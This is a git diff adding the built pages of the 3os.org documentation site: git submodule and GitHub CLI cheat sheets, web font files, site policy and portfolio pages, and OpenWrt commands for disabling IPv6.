If you’re sure you want to fetch all submodules (and their submodules), you can also use this fancy one-liner:
git clone --recurse-submodules https://github.com/fire1ce/3os.org
+
Submodule Update If you’re simply tracking the master
or main
branch for the submodule, you can suffice with a simple fetch
and merge
.
cd path/to/submodule
+git fetch
+git merge origin/master
+
If you’re in a hurry, you can streamline this for all submodules in your repo with:
git submodule update --remote --recursive
+
Commit this change to your own repo, so others are locked to this new version of the submodule as well.
Remove a submodule Delete the relevant section from the .gitmodules
file. Stage the .gitmodules
changes git add .gitmodules
Delete the relevant section from .git/config
. Run git rm --cached path_to_submodule
(no trailing slash). Run rm -rf .git/modules/path_to_submodule
(no trailing slash). Commit git commit -m "Removed submodule"
Delete the now untracked submodule files rm -rf path_to_submodule
Back to top
\ No newline at end of file
diff --git a/devops/git/github-cli/index.html b/devops/git/github-cli/index.html
new file mode 100644
index 000000000..949bee21b
--- /dev/null
+++ b/devops/git/github-cli/index.html
@@ -0,0 +1,170 @@
+
GitHub Cli - 3os github git cheat-sheet GitHub Cli Cheat Sheet The GitHub CLI is a free and open source CLI tool to interact with GitHub repositories. It allows you to work solely from the command line, as well as navigate to remote (web) repositories very easily.
Installation The GitHub Cli can be found at https://cli.github.com/ . The installation is very straightforward, for example,
on macOS. Some example commands View the repository remotely.
Create a pull request remotely.
Back to top
\ No newline at end of file
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.eot b/fonts/FiraCode/fira-code-v12-latin-300.eot
new file mode 100644
index 000000000..744e323eb
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.eot differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.svg b/fonts/FiraCode/fira-code-v12-latin-300.svg
new file mode 100644
index 000000000..368e6d8ba
--- /dev/null
+++ b/fonts/FiraCode/fira-code-v12-latin-300.svg
@@ -0,0 +1,333 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.ttf b/fonts/FiraCode/fira-code-v12-latin-300.ttf
new file mode 100644
index 000000000..3fe9256ff
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.ttf differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.woff b/fonts/FiraCode/fira-code-v12-latin-300.woff
new file mode 100644
index 000000000..b78e61b34
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.woff differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-300.woff2 b/fonts/FiraCode/fira-code-v12-latin-300.woff2
new file mode 100644
index 000000000..64ceab069
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-300.woff2 differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.eot b/fonts/FiraCode/fira-code-v12-latin-700.eot
new file mode 100644
index 000000000..23eacaf61
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.eot differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.svg b/fonts/FiraCode/fira-code-v12-latin-700.svg
new file mode 100644
index 000000000..71d858188
--- /dev/null
+++ b/fonts/FiraCode/fira-code-v12-latin-700.svg
@@ -0,0 +1,334 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.ttf b/fonts/FiraCode/fira-code-v12-latin-700.ttf
new file mode 100644
index 000000000..efd519b96
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.ttf differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.woff b/fonts/FiraCode/fira-code-v12-latin-700.woff
new file mode 100644
index 000000000..1283d4b72
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.woff differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-700.woff2 b/fonts/FiraCode/fira-code-v12-latin-700.woff2
new file mode 100644
index 000000000..7815ee436
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-700.woff2 differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.eot b/fonts/FiraCode/fira-code-v12-latin-regular.eot
new file mode 100644
index 000000000..c1176835e
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.eot differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.svg b/fonts/FiraCode/fira-code-v12-latin-regular.svg
new file mode 100644
index 000000000..1b39d2c11
--- /dev/null
+++ b/fonts/FiraCode/fira-code-v12-latin-regular.svg
@@ -0,0 +1,334 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.ttf b/fonts/FiraCode/fira-code-v12-latin-regular.ttf
new file mode 100644
index 000000000..2b2df88e4
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.ttf differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.woff b/fonts/FiraCode/fira-code-v12-latin-regular.woff
new file mode 100644
index 000000000..2be7c9459
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.woff differ
diff --git a/fonts/FiraCode/fira-code-v12-latin-regular.woff2 b/fonts/FiraCode/fira-code-v12-latin-regular.woff2
new file mode 100644
index 000000000..f7efdf8c1
Binary files /dev/null and b/fonts/FiraCode/fira-code-v12-latin-regular.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.eot b/fonts/Rubik/rubik-v14-latin-300.eot
new file mode 100644
index 000000000..a83d02593
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.svg b/fonts/Rubik/rubik-v14-latin-300.svg
new file mode 100644
index 000000000..32ef9d3e6
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-300.svg
@@ -0,0 +1,453 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-300.ttf b/fonts/Rubik/rubik-v14-latin-300.ttf
new file mode 100644
index 000000000..9b18046b9
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.woff b/fonts/Rubik/rubik-v14-latin-300.woff
new file mode 100644
index 000000000..599f830a5
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-300.woff2 b/fonts/Rubik/rubik-v14-latin-300.woff2
new file mode 100644
index 000000000..3eab1dd10
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-300.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.eot b/fonts/Rubik/rubik-v14-latin-700.eot
new file mode 100644
index 000000000..b76ef8bdd
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.svg b/fonts/Rubik/rubik-v14-latin-700.svg
new file mode 100644
index 000000000..fc14e0b00
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-700.svg
@@ -0,0 +1,456 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-700.ttf b/fonts/Rubik/rubik-v14-latin-700.ttf
new file mode 100644
index 000000000..41d495ee2
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.woff b/fonts/Rubik/rubik-v14-latin-700.woff
new file mode 100644
index 000000000..ebe254446
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-700.woff2 b/fonts/Rubik/rubik-v14-latin-700.woff2
new file mode 100644
index 000000000..33e64609e
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-700.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.eot b/fonts/Rubik/rubik-v14-latin-italic.eot
new file mode 100644
index 000000000..a284e1855
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.svg b/fonts/Rubik/rubik-v14-latin-italic.svg
new file mode 100644
index 000000000..10b05536a
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-italic.svg
@@ -0,0 +1,463 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-italic.ttf b/fonts/Rubik/rubik-v14-latin-italic.ttf
new file mode 100644
index 000000000..b3931b034
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.woff b/fonts/Rubik/rubik-v14-latin-italic.woff
new file mode 100644
index 000000000..f2f013e4d
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-italic.woff2 b/fonts/Rubik/rubik-v14-latin-italic.woff2
new file mode 100644
index 000000000..b01cfd0c0
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-italic.woff2 differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.eot b/fonts/Rubik/rubik-v14-latin-regular.eot
new file mode 100644
index 000000000..b5559eeed
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.eot differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.svg b/fonts/Rubik/rubik-v14-latin-regular.svg
new file mode 100644
index 000000000..8f4654865
--- /dev/null
+++ b/fonts/Rubik/rubik-v14-latin-regular.svg
@@ -0,0 +1,453 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/fonts/Rubik/rubik-v14-latin-regular.ttf b/fonts/Rubik/rubik-v14-latin-regular.ttf
new file mode 100644
index 000000000..e11b0ebb1
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.ttf differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.woff b/fonts/Rubik/rubik-v14-latin-regular.woff
new file mode 100644
index 000000000..b8e79e188
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.woff differ
diff --git a/fonts/Rubik/rubik-v14-latin-regular.woff2 b/fonts/Rubik/rubik-v14-latin-regular.woff2
new file mode 100644
index 000000000..13bc82fdf
Binary files /dev/null and b/fonts/Rubik/rubik-v14-latin-regular.woff2 differ
diff --git a/homelab/devices/synology-nas/index.html b/homelab/devices/synology-nas/index.html
new file mode 100644
index 000000000..165fc4549
--- /dev/null
+++ b/homelab/devices/synology-nas/index.html
@@ -0,0 +1,167 @@
+
Synology NAS - 3os
\ No newline at end of file
diff --git a/illustration.svg b/illustration.svg
new file mode 100644
index 000000000..192927fde
--- /dev/null
+++ b/illustration.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/index.html b/index.html
new file mode 100644
index 000000000..303919e68
--- /dev/null
+++ b/index.html
@@ -0,0 +1,402 @@
+
3os.org - 3os
3os Project Collocation of technical documentation and guides for devops, developers, pentesters, systems administrators and other IT professionals.
Blog Github Open-Source We provide an open-source knowledge base on various topics such as Devops, security, penetration testing, networking and much more.
Contribution We are welcoming you to contribute your knowledge to this project. Submit git pull requests for new content, or help as fix and maintain the documentation.
Discussion Feel free to open a discussion on any topic at comments section any time.
Back to top
\ No newline at end of file
diff --git a/information/affiliateDisclosure/index.html b/information/affiliateDisclosure/index.html
new file mode 100644
index 000000000..629fd9bff
--- /dev/null
+++ b/information/affiliateDisclosure/index.html
@@ -0,0 +1,143 @@
+
Affiliate Disclosure - 3os information affiliate Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Affiliate Disclosure This website can include advertising, supported content, paid inserts, affiliate links or other types of monetization.
We believe in the authenticity of relationships, views and identities. Compensation received can have an effect on the advertisement material, topics or posts made in this blog. Such content, advertising space or post will be specifically marked as paid or supported content. We will only endorse the products or services that we believe, based on our expertise, are worthy of this endorsement.
Any claim, statistic, quotation or other representation of a product or service should be verified with the manufacturer or supplier. This site does not contain any content that may constitute a conflict of interest.
This website does not provide any representations, warranties or assurances as to the accuracy,
currency or completeness of the content contained on this website or on any website linked to or from this website.
Participant Programs​ This website is a participant in the Amazon Services LLC Associates Program, aliexpress, an affiliate advertisement program designed to provide a way for websites to receive advertising fees through advertising and links to amazon.com, aliexpress.com.
Back to top
\ No newline at end of file
diff --git a/information/cookies-policy/index.html b/information/cookies-policy/index.html
new file mode 100644
index 000000000..24b6b931a
--- /dev/null
+++ b/information/cookies-policy/index.html
@@ -0,0 +1,143 @@
+
Cookies Policy - 3os information Cookies Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Cookies Policy We use cookies and other similar technologies to help provide our Services, to advertise to you and to analyse how you use our Services and whether advertisements are being viewed. We also allow third parties to use tracking technologies for similar purposes. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether.
What are Cookies? A cookie is a small text file which is sent to your computer or mobile device (referred to in this policy as a “deviceâ€) by the web server so that the website can remember some information about your browsing activity on the website. The cookie will collect information relating to your use of our sites, information about your device such as the device’s IP address and browser type, demographic data and, if you arrived at our site via a link from third party site, the URL of the linking page. If you are a registered user or subscriber it may also collect your name and email address, which may be transferred to data processors for registered user or subscriber verification purposes. Cookies record information about your online preferences and help us to tailor our websites to your interests. Information provided by cookies can help us to analyse your use of our sites and help us to provide you with a better user experience. We use tracking technologies for the following purposes:
These cookies are necessary for the website to function and cannot be switched off in our systems. These are used to let you login, to ensure site security and to provide shopping cart functionality. Without this type of technology, our Services won’t work properly or won’t be able to provide certain features and functionalities.
Personalization Cookies These cookies are used to analyze how visitors use a website, for instance which pages visitors visit most often, in order to provide a better user experience. We also use this technology to check if you have opened our emails, so we can see if they are being delivered correctly and are of interest.
Advertising Cookies These cookies are used to limit the number of times you see an advertisement, or to customize advertising across our Services and make it more relevant to you and to allow us to measure the effectiveness of advertising campaigns and track whether ads have been properly displayed so we can pay for this. You have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU “Advertising cookies†and here for US Advertising cookies.
Cookies are used by social media services to enable you to share our content with your friends and networks. These cookies may track your browser across other sites and build a profile of your interests, which may impact the content and messages you see on other websites that you visit.
Google Analytics We use Google Analytics for aggregated, anonymized website traffic analysis. In order to track your session usage, Google drops a cookie (_ga) with a randomly-generated ClientID in your browser. This ID is anonymized and contains no identifiable information like email, phone number, name, etc. We also send Google your IP Address. We use GA to track aggregated website behavior, such as what pages you looked at, for how long, and so on. This information is important to us for improving the user experience and determining site effectiveness. If you would like to access what browsing information we have – or ask us to delete any GA data – please delete your _ga cookies, reach out to us via this form, and/or install the Google Analytics Opt-Out Browser Add-On.
How to manage & remove cookies If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether. You can also visit https://www.aboutcookies.org for more information on how to manage and remove cookies across a number of different internet browsers. You also have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU “Advertising cookies†and here for US Advertising cookies. If you would like to contact us about cookies please our online feedback form or our contact page.
Back to top
\ No newline at end of file
diff --git a/information/endorsement/index.html b/information/endorsement/index.html
new file mode 100644
index 000000000..4a85c2636
--- /dev/null
+++ b/information/endorsement/index.html
@@ -0,0 +1,143 @@
+
Website Endorsements - 3os information endorsements Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-04-03 Website Endorsements Website endorsement for our partners and friends who support our mission.
adventure.app Adventure is an app that provides you with a simple and intuitive interface to plan your trip. You can choose from a wide range of activities and destinations. We also provide you with a recommendation system that will help you choose the best activity for you. Visit adventure.app!
Back to top
\ No newline at end of file
diff --git a/information/license/index.html b/information/license/index.html
new file mode 100644
index 000000000..d90d57002
--- /dev/null
+++ b/information/license/index.html
@@ -0,0 +1,143 @@
+
MIT License - 3os information license Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 License MIT License Copyright© 3os.org 2022
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/information/portfolio/index.html b/information/portfolio/index.html
new file mode 100644
index 000000000..12ca37d28
--- /dev/null
+++ b/information/portfolio/index.html
@@ -0,0 +1,146 @@
+
Stas Yakobov's Portfolio - 3os portfolio resume Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-03-23 Stas Yakobov's Portfolio Stas Yakobov aka fire1ce • I'm security researcher - specialized in hardware pentetrations tests
• I like experimenting with technologies, building small projects, automate everything.
• Passionate about security, linux, dockers, electronics(IoT), coding, open-source and knowledge
• I'm the owner and the maintener of a 3os.org knowledge-base website
How To Reach Me
Back to top
\ No newline at end of file
diff --git a/information/privacy-policy/index.html b/information/privacy-policy/index.html
new file mode 100644
index 000000000..c37152b46
--- /dev/null
+++ b/information/privacy-policy/index.html
@@ -0,0 +1,143 @@
+
Privacy Policy - 3os information privacy policy Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Privacy Policy Your privacy is very important to us. Accordingly, we have developed this policy in order for you to understand how we collect, use, communicate and make use of personal information. The following outlines our privacy policy.
When accessing this website, will learn certain information about you during your visit.
Similar to other commercial websites, our website utilizes a standard technology called ‘cookies’ (see explanation below) and server logs to collect information about how our site is used. Information gathered through cookies and server logs may include the date and time of visits, the pages viewed, time spent at our site, and the websites visited just before and just after our own, as well as your IP address.
Use of Cookie A cookie is a very small text document, which often includes an anonymous unique identifier. When you visit a website, that site’s computer asks your computer for permission to store this file in a part of your hard drive specifically designated for cookies. Each website can send its own cookie to your browser if your browser’s preferences allow it, but (to protect your privacy) your browser only permits a website to access the cookies it has already sent to you, not the cookies sent to you by other sites.
IP Addresses IP addresses are used by your computer every time you are connected to the Internet. Your IP address is a number that is used by computers on the network to identify your computer. IP addresses are automatically collected by our web server as part of demographic and profile data known as “traffic data†so that data (such as the Web pages you request) can be sent to you.
If you choose to correspond with us through email, we may retain the content of your email messages together with your email address and our responses. We provide the same protections for these electronic communications that we employ in the maintenance of information received online, mail and telephone. This also applies when you register for our website, sign up through any of our forms using your email address or make a purchase on this site. For further information see the email policies below.
Broadly speaking, we use personal information for purposes of administering our business activities, providing customer service and making available other items and services to our customers and prospective customers.
will not obtain personally-identifying information about you when you visit our site, unless you choose to provide such information to us, nor will such information be sold or otherwise transferred to unaffiliated third parties without the approval of the user at the time of collection.
We may disclose information when legally compelled to do so, in other words, when we, in good faith, believe that the law requires it or for the protection of our legal rights.
Email Policies We are committed to keeping your e-mail address confidential. We do not sell, rent, or lease our subscription lists to third parties, and we will not provide your personal information to any third party individual, government agency, or company at any time unless strictly compelled to do so by law.
We will use your e-mail address solely to provide timely information about .
We will maintain the information you send via e-mail in accordance with applicable federal law.
CAN-SPAM Compliance In compliance with the CAN-SPAM Act, all e-mail sent from our organization will clearly state who the e-mail is from and provide clear information on how to contact the sender. In addition, all e-mail messages will also contain concise information on how to remove yourself from our mailing list so that you receive no further e-mail communication from us.
Choice/Opt-Out Our site provides users the opportunity to opt-out of receiving communications from us and our partners by reading the unsubscribe instructions located at the bottom of any e-mail they receive from us at anytime.
Users who no longer wish to receive our newsletter or promotional materials may opt-out of receiving these communications by clicking on the unsubscribe link in the e-mail.
Use of External Links This website may contain links to many other websites. cannot guarantee the accuracy of information found at any linked site. Links to or from external sites not owned or controlled by do not constitute an endorsement by or any of its employees of the sponsors of these sites or the products or information presented therein.
By accessing this web site, you are agreeing to be bound by these web site Terms and Conditions of Use, all applicable laws and regulations, and agree that you are responsible for compliance with any applicable local laws. If you do not agree with any of these terms, you are prohibited from using or accessing this site. The materials contained in this web site are protected by applicable copyright and trade mark law.
Acceptable Use You agree to use our website only for lawful purposes, and in a way that does not infringe the rights of, restrict or inhibit anyone else’s use and enjoyment of the website. Prohibited behavior includes harassing or causing distress or inconvenience to any other user, transmitting obscene or offensive content or disrupting the normal flow of dialogue within our website.
You must not use our website to send unsolicited commercial communications. You must not use the content on our website for any marketing related purpose without our express written consent.
Restricted Access We may in the future need to restrict access to parts (or all) of our website and reserve full rights to do so. If, at any point, we provide you with a username and password for you to access restricted areas of our website, you must ensure that both your username and password are kept confidential.
Use of Testimonials In accordance to with the FTC guidelines concerning the use of endorsements and testimonials in advertising, please be aware of the following:
Testimonials that appear on this site are actually received via text, audio or video submission. They are individual experiences, reflecting real life experiences of those who have used our products and/or services in some way. They are individual results and results do vary. We do not claim that they are typical results. The testimonials are not necessarily representative of all of those who will use our products and/or services.
The testimonials displayed in any form on this site (text, audio, video or other) are reproduced verbatim, except for correction of grammatical or typing errors. Some may have been shortened. In other words, not the whole message received by the testimonial writer is displayed when it seems too lengthy or not the whole statement seems relevant for the general public.
We are not responsible for any of the opinions or comments posted on this website. This website is not a forum for testimonials, however provides testimonials as a means for customers to share their experiences with one another. To protect against abuse, all testimonials appear after they have been reviewed by the management . We not share the opinions, views or commentary of any testimonials on this website – the opinions are strictly the views of the testimonial source.
The testimonials are never intended to make claims that our products and/or services can be used to diagnose, treat, cure, mitigate or prevent any disease. Any such claims, implicit or explicit, in any shape or form, have not been clinically tested or evaluated.
How Do We Protect Your Information And Secure Information Transmissions?
Email is not recognized as a secure medium of communication. For this reason, we request that you do not send private information to us by email. However, doing so is allowed, but at your own risk. Some of the information you may enter on our website may be transmitted securely via a secure medium known as Secure Sockets Layer, or SSL. Credit Card information and other sensitive information is never transmitted via email.
We may use software programs to create summary statistics, which are used for such purposes as assessing the number of visitors to the different sections of our site, what information is of most and least interest, determining technical design specifications, and identifying system performance or problem areas.
For site security purposes and to ensure that this service remains available to all users, uses software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage.
Disclaimer And Limitation Of Liability We makes no representations, warranties, or assurances as to the accuracy, currency or completeness of the content contain on this website or any sites linked to this site.
All the materials on this site are provided ‘as is’ without any express or implied warranty of any kind, including warranties of merchantability, noninfringement of intellectual property or fitness for any particular purpose. In no event shall or its agents or associates be liable for any damages whatsoever (including, without limitation, damages for loss of profits, business interruption, loss of information, injury or death) arising out of the use of or inability to use the materials, even if has been advised of the possibility of such loss or damages.
Policy Changes We reserve the right to amend this privacy policy at any time with or without notice. However, please be assured that if the privacy policy changes in the future, we will not use the personal information you have submitted to us under this privacy policy in a manner that is materially inconsistent with this privacy policy, without your prior consent.
We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.
Back to top
\ No newline at end of file
diff --git a/infrastructure/openwrt/disable-ipv6/index.html b/infrastructure/openwrt/disable-ipv6/index.html
new file mode 100644
index 000000000..84bb3df89
--- /dev/null
+++ b/infrastructure/openwrt/disable-ipv6/index.html
@@ -0,0 +1,184 @@
+
Disable IPV6 - 3os template markdown Authors: fire1ce | Created: 2021-12-02 | Last update: 2022-04-24 OpenWrt Disable IPV6 The following steps will disable IPV6 on your OpenWrt router . All the steps are performed via the command line. You can performe them in the console of the router but the preferred way is via SSH.
Follow the following steps to disable IPV6 on your OpenWrt router:
uci set 'network.lan.ipv6=0'
+uci set 'network.wan.ipv6=0'
+uci set 'dhcp.lan.dhcpv6=disabled'
+/etc/init.d/odhcpd disable
+uci commit
+
Disable RA and DHCPv6 so no IPv6 IPs are handed out:
uci -q delete dhcp.lan.dhcpv6
+uci -q delete dhcp.lan.ra
+uci commit dhcp
+/etc/init.d/odhcpd restart
+
You can now disable the LAN delegation:
uci set network.lan.delegate= "0"
+uci commit network
